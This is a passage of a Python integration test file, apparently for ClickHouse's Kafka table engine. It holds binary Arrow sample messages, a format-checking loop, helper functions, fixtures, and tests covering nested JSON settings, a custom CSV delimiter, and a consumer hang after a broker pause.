\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\
x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
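# Each entry above follows the same shape (a descriptive summary, not new logic):
# 'data_sample' holds three messages - one row with id=0, a batch with ids 1..15,
# and one more row with id=0; 'extra_settings' is appended verbatim to the Kafka
# SETTINGS clause, and 'supports_empty_value' controls whether an empty message is
# prepended (shifting the expected offsets by one in the checks below).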
for format_name, format_opts in list(all_formats.items()):
logging.debug('Set up {}'.format(format_name))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug('Checking {}'.format(format_name))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since receiving messages from Kafka is asynchronous and somewhat flaky,
# we may need to check the results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
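# A minimal usage sketch (assuming messages matching 'test_kafka_json.reference'
# were already produced); it is equivalent to the poll-in-a-loop pattern used by
# the tests below - accumulate results until they match, then assert once for a
# readable failure message:
#   result = ''
#   while not kafka_check_result(result):
#       result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
#   kafka_check_result(result, True)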
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
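# A hedged usage sketch: the helper returns one dict per group member, e.g.
#   members = describe_consumer_group(kafka_cluster, 'consumer_hang')
#   members[0]['client_id']                   # client id reported by the consumer
#   members[0]['assignment'][0]['topic']      # topic assigned to that member
#   members[0]['assignment'][0]['partitions'] # list of assigned partition ids
# (the group name here is illustrative; any existing consumer group works).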
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print("kafka_id is {}".format(kafka_id))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that the materialized view respects Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter now works - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger a heartbeat failure,
# which will trigger REBALANCE_IN_PROGRESS
# and can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# The original problem showed up as the following sequence of messages in the librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. librdkafka waited forever for the application to execute the queued rebalance callback.
# From a user perspective: we expect no hanging 'drop' queries.
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
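# A small illustration of the 'dr'||'op' trick used above (plain ClickHouse string
# concatenation, nothing new assumed): the query text stored in system.processes
# contains the literal 'dr'||'op', which only evaluates to 'drop' at run time, so
# the monitoring query never matches its own text:
#   SELECT position(lower(query), 'dr'||'op') FROM system.processes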
def test_kafka_consumer_hang2(kafka_cluster):
